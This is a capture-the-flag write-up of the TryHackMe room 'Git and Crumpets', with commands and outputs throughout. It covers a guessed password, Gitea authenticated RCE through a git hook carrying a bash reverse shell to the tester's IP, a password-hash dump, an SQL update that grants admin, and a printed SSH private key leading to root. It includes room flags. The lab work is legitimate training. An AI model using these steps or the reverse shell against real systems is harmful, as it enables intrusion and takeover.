TryHackMe - Git and Crumpets - Writeup

Git and Crumpets

Our devs have been clamoring for some centralized version control, so the admin came through. Rumour has it that they included a few countermeasures…

Nmap scanning

root@ip-10-10-226-10:~# nmap -sCV -A 10.10.130.239 -T4

Starting Nmap 7.60 ( https://nmap.org ) at 2021-07-02 22:11 BST
Nmap scan report for ip-10-10-130-239.eu-west-1.compute.internal (10.10.130.239)
Host is up (0.00053s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 8.0 (protocol 2.0)
80/tcp   open   http       nginx
|_http-server-header: nginx
| http-title: 503 Service Temporarily Unavailable
|_Requested resource was http://ip-10-10-130-239.eu-west-1.compute.internal/index.html
9090/tcp closed zeus-admin
MAC Address: 02:F5:B8:0C:58:1B (Unknown)
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 3.13 (90%), Linux 3.8 (90%), Linux 2.6.32 (89%), Linux 2.6.32 - 3.1 (89%), Infomir MAG-250 set-top box (89%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (89%), Linux 3.7 (89%), Ubiquiti AirOS 5.5.9 (89%), Ubiquiti Pico Station WAP (AirOS 5.2.6) (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.53 ms ip-10-10-130-239.eu-west-1.compute.internal (10.10.130.239)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.66 seconds

And the server goes down so I had to restart the target URL once again. So, after restart service I found that when you visit to the url it will take you to Never Gonna Give Up youtube video.

root@ip-10-10-1-97:~# curl 10.10.87.115
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Go away!</title>
  </head>
  <body>
    <main>
      <h1>Nothing to see here, move along</h1>
      <h2>Notice:</h2>
      <p> 
        Hey guys,
           I set up the dev repos at git.git-and-crumpets.thm, but I haven't gotten around to setting up the DNS yet. 
           In the meantime, here's a fun video I found!
        Hydra
      </p>
      <pre>

Setup your target url to /etc/hosts like:

10.10.87.115 git.git-and-crumpets.thm

Now naviagte to the URL http://git.git-and-crumpets.thm/ and register to the site there is a a repo called cant-touch-this, I saw there is 5 commit has been created in master repo.

There is a commit name it have comment said that I kept the password in my avatar to be more secure.

Download his image from the repo

root@ip-10-10-1-97:~# wget http://git.git-and-crumpets.thm/avatars/3fc2cde6ac97e8c8a0c8b202e527d56d
--2021-07-03 06:58:17--  http://git.git-and-crumpets.thm/avatars/3fc2cde6ac97e8c8a0c8b202e527d56d
Resolving git.git-and-crumpets.thm (git.git-and-crumpets.thm)... 10.10.87.115
Connecting to git.git-and-crumpets.thm (git.git-and-crumpets.thm)|10.10.87.115|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [image/png]
Saving to: \u20183fc2cde6ac97e8c8a0c8b202e527d56d\u2019

3fc2cde6ac97e8c8a0c8b202e527d56d            [ <=>                                                                          ] 278.88K  --.-KB/s    in 0.002s  

2021-07-03 06:58:17 (158 MB/s) - \u20183fc2cde6ac97e8c8a0c8b202e527d56d\u2019 saved [285570]

root@ip-10-10-1-97:~# exiftool 3fc2cde6ac97e8c8a0c8b202e527d56d
ExifTool Version Number         : 10.80
File Name                       : 3fc2cde6ac97e8c8a0c8b202e527d56d
Directory                       : .
File Size                       : 279 kB
File Modification Date/Time     : 2021:04:15 17:13:00+01:00
File Access Date/Time           : 2021:07:03 06:58:17+01:00
File Inode Change Date/Time     : 2021:07:03 06:58:17+01:00
File Permissions                : rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 290
Image Height                    : 290
Bit Depth                       : 16
Color Type                      : RGB
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Description                     : My 'P****d' should be easy enough to guess
Image Size                      : 290x290
Megapixels                      : 0.084

And I got a email from his profile withcream@example.com lets try to login with

withcream@example.com:Password

Logged in after logged in what should I do, I don’t know so I start finding if any authnicated user do something after finding I saw that there is a CVE for GiTea and the blog about Exploiting CVE-2020-14144 - GiTea Authenticated Remote Code Execution using git hooks and the CVE-2020-14144

Now run netcat to listen to a port for reverse shell, Edit the pre-receive hook and paste your reverse shell to get access

#!/bin/bash
bash -i >& /dev/tcp/10.10.1.97/1234 0>&1

Now edit README.md so the pre-receive hook will execute.

root@ip-10-10-1-97:~# nc -nlvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 10.10.87.115 46630 received!
bash: cannot set terminal process group (881): Inappropriate ioctl for device
bash: no job control in this shell
[git@git-and-crumpets cant-touch-this.git]$ ls
ls
HEAD
branches
config
description
hooks
info
objects
refs
[git@git-and-crumpets cant-touch-this.git]$ cd ~
cd ~
[git@git-and-crumpets ~]$ ls
ls
user.txt
[git@git-and-crumpets ~]$ cat user.txt
cat user.txt
dGhte2ZkN2Fi********TdjZDcwY2YzZDZhYTE2fQ==

Decode the base64 encoding

$ echo dGhte2ZkN2Fi********TdjZDcwY2YzZDZhYTE2fQ== | base64 -d

thm{fd7ab9ffd40*******257cd70cf3d6aa16}

I saw that GiTea save their data into /var/lib/gitea/

Gitea repository data will be saved into /var/lib/gitea/repos/ . It is possible to overrule this location in /etc/gitea/app

[git@git-and-crumpets data]$ ls
ls
attachments
avatars
gitea-repositories
gitea.db
indexers
lfs
queues
repo-avatars
sessions
tmp
[git@git-and-crumpets data]$ which sqlite3
which sqlite3
/usr/bin/sqlite3

open gitea.db

[git@git-and-crumpets data]$ sqlite3 gitea.db
sqlite3 gitea.db
select * from user;
1|hydra|hydra||hydragyrum@example.com|0|enabled|9b020d3e158bc31b5fe64d668d94cab38cadc6721a5fdf7a4b1fb7bf97021c5e68f56bd9bd44d5ce9547e5e234086342c4e4|pbkdf2|0|0|0||0|||XGySX7uBlc|3C4NzJWN9e|en-US||1618386984|1621615239|1621614217|0|-1|1|1|0|0|0|0|0|d91f03c868d38ecf84ab3cc54f876106|hydragyrum@example.com|1|0|0|0|1|0|0|0|0|unified|arc-green|0
2|root|root|groot|root@example.com|0|enabled|2181d2b5fbf1859db426bcb94d97851d9a0e87a5eb47c5edc7f92bffc45b679e554c8367084f379e59936b68c0d770823ec9|pbkdf2|0|0|0||0|||2VK8fSxvIZ|5e5xPrzvBr|en-US||1618391049|1621716065|1621716065|1|-1|1|0|1|0|0|0|0|b2b218891f86ea980812a5b934ecec1a|root@examle.com|1|0|0|0|1|0|0|0|0|unified|gitea|0
3|scones|scones||withcream@example.com|0|enabled|8d0386b217e0f1ad5a1012d879ce93c9d77fd79d888410fdee9e76ec58d6fa017042906dd9a2ea498d3fd5a7486a73875660|pbkdf2|0|0|0||0|Her Majesty's Secret Service||IF60pw0rVc|13y4Vtc2AH|en-US|I like scones.|1618492621|1625292211|1625292211|0|-1|1|0|0|1|0|0|0|3fc2cde6ac97e8c8a0c8b202e527d56d|jackel@example.com|1|0|0|0|1|0|0|0|0|unified|gitea|0
4|test|test||test@test.thm|0|enabled|d3463d9c205751364af7850bca7956d0f5cc0eb125a097db54fd0087eec31cec1912245e57fdfc53423a89e6684a15f8939a|pbkdf2|0|0|0||0|||oe4oKzc3mk|EgtShiimON|en-US||1618526457|1618526530|1618526457|0|-1|1|0|0|0|0|0|0|15c9bc2cfbc7b7fd0b627422d8189173|test@test.thm|0|0|0|0|0|0|0|0|0|unified|gitea|0
5|user101|user101||test@mail.com|0|enabled|7233dc67184372521c3e39c824016db859d608025ad5a731f1dbed0d399753c17de21921618a385804ddc6bc57893049d555|pbkdf2|0|0|0||0|||BFMsu8xkcI|mameP7va9K|en-US||1625291416|1625291644|1625291416|0|-1|1|0|0|0|0|0|0|97dfebf4098c0f5c16bca61e2b76c373|test@mail.com|0|0|0|0|0|0|0|0|0|unified|gitea|0

As we have email and password of user scones lets change the permission to admin of the user.

UPDATE user SET is_admin=1 WHERE id=3;

As we changed the permission to the user now we can access user root repo which include a repo called backup

There is two new branch one is master and second one is dotfiles in the dotfiles branch I found 4 commmit in there.

A commit is Add '.ssh/Sup3rS3cur3' the user stored a SSH private key at Sup3rS3cur3

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCiDnis8h
K3kgcH6yJEnGngAAAAEAAAAAEAAAGXAAAAB3NzaC1yc2EAAAADAQABAAABgQCwF1w1EjRq
V3FQnYGyl4YNT1nV9UiqaaZQ2gPhXS1UaLpZdQh95hh1mfdAs8K/S6M8CnDNARInNNshHh
8uOxielRURN4oufmFQgv121ls0ikDHchTsmsYrVY7TOvTYXods5s6Oog0UYIPcCXj88wUp
kfRKXyfAMe3rWndrkJHx87ddkioeGVsi2ewGOEjHylGf0AhofPEij66jmUp0FN78DwsUYa
oIZThhZ+AbsajClZn+TRFv7Amb0+4LD5KGfeuu2RSFTVinE2YJAR5DPwrOy6jDkT4x/H7Q
UMX3CjWzFwA0wfBvgnQszE/K7T5W1EwLq1lbohWHBDKucjExdHuvWg28m0iBZytNqnM+J3
WclB/l9TTGOvy6coA/szhDPrOiZfzd5bsEfE0LVpbKeh6Mk1d+bwNY2CXH5Uz1gRGS8eW+
StKgaSUGRGaaay04QwrqNpztHNZ5ko+pUwHVL+sWAQp5HOTNbBqknK/Nb3A2koMTF9MlVg
8U3hR8gfqXYr0AAAWQ5lKoq0F7ffH+XaIEng7tJ4gHs3NVKxSTtvKmL42x/g291VXsUP56
fx9Z43GF7Bu6x1nugmiKsDszQgJKGpiAontQVRJux6UMIuoD05WXnYluKZiJMrGNBoN1SM
JM9x6pUatqA7kyqLGwbLjvsWOWMacyg5NsRrJiUfMET0qVZqkaaQIb13lB9tIrkh9hnLyS
v/I+qw/WKlyibOy7wsD5BpNTiWRd2aDwLimo1vgRcXRtsfWjjvlNbUfP16rwu1TnaR9YKn
uz3pTftLL5je1v6/1lRdWKk2r3NtarQnYm5rwh80vyiyNvfmS9kDKRyeFr1GwM0ZGy7f5V
HLoZoEfrlw+IgeREOYk1Ae5xieeaalxjHXJuYYatN0511Ir/N9EGKL5cqmZWkiSj9QEb4J
gGdbrWcE0RP+3yRQnHP6PO2jAlZID2yry6YA8JhJbRQtCizXqgQyR6Z4o4tEoBU4vYvqGb
[....]
9ayg/QUYDXsD3a3saS7470/KjiFshUU5DG/V06sdtACj4ZSvS8ekTeT5zUERHcTZfnnoIh
AhlPmYdE2BELXgEPHU8rHBiSQ4q5wKOjLdN08sCh9mcpvutEzXetljI1qO5ENdFDYnzsRL
LSgcsos750omKmsro5dQd5UvZEOIwYwlCMa1xFBcDVWX4mAgf5cpjL4KkbkcgOxingB3/q
5RtD3YSO60ErtqU4roTWFFwOio/7tx1Lcea4qE5+ZQfmJiDyTVEabK30GP8mT9A0RVkEUe
iif2kJVBGvqf6yu5UNf/UAZVOhCy8DO69YrLFZrl+rVIkbcIWc91+VWxjZ/3r0ef9g+tL7
b3bRur89oSUWuWxZDMNyKjZwRNZsg61hreOmMdU9oq61RU6FjPyrheo0JI4mnHC/Ry9SSX
cW4HEkmMStLxfj/tVwCPymajShhjyHR4aYD945aGvzQxmBjAnNg1bzy2v+6UY5bGMcAXwW
i6ZbKJKr0vUG66V9tWOsNBz1Rc1vVnoCrgEvA+ErmHcPqqZdTkA3PPIPyyUCa/Oq8fME6e
cOdslp2TwdfI0vqjoWf+skUKVvnMSpmUmwRWfZfZGTitAcH57DLGB1E7Pagi5RT2XjuMSO
usgEUaovuH8uRBq7TC4GQsMEwTyNKlUzrzHNM3JbNGqECIJawNghCWFRCFY5Bq2lPqvnvN
Jtp737wXXQw2NqktrRIDkrPwpeF1Tdt4ixx8UNEpdAPsKu4pKdeU6VR/cqfYXOnoFWskPt
Fqfv1mMiIbHA8TYl+cWBVMkm6t4N+4N0T08pLnS8eDWgg6xCxkM2Kr37OsGPv1X7NR4QU8
3PGoejtziLj9kYYuJedlEY4xJVJ69o7bq+C320DoQN9+WYSCJkySJEsbxDwx04GhI54Xig
8FR4oALQzYnf7oVRbYDZoQihFNYKEf5U5UpPs0gfry8DWAIrOGsDBVLBdRlS7H1i578Nbm
HmIcosvtoCpSBl6HOX0S7gNAIiGLOP0zo3R8pdFkriFDauFa17Lao3IKKuBD6jOCFGBuD+
f+V62ikG7042lp/fhTYiDgRfvXA=
-----END OPENSSH PRIVATE KEY-----

Now copy the private key and use it but it have password when the password prompt popuped I use Su****ur3 to connect to SSH

Make sure to change the permission of the id_rsa key.

root@ip-10-10-1-97:~# nano id_rsa
root@ip-10-10-1-97:~# chmod 600 id_rsa
root@ip-10-10-1-97:~# ssh -i id_rsa root@git.git-and-crumpets.thm
The authenticity of host 'git.git-and-crumpets.thm (10.10.87.115)' can't be established.
ECDSA key fingerprint is SHA256:Tm4zUvVK5KsvOsFB2xvRHK4yg58piyOwURqB1Zr2tXI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'git.git-and-crumpets.thm,10.10.87.115' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Last login: Fri Jul  2 23:11:30 2021
[root@git-and-crumpets ~]# whoami
root
[root@git-and-crumpets ~]# cat /root/root.txt
dGhtezYzMjAyMjhkZDllMzE1ZjI4M2I3NTg4NzI0MGRjNmExfQ==
[root@git-and-crumpets ~]# echo dGhtezYzMjAyMjhkZ*****ZjI4M2I3NTg4NzI0MGRjNmExfQ== | base64 -d
thm{6320228dd9e315*****75887240dc6a1}

So we got the root too.

Room link: Git and Crumpets

Written on July 3, 2021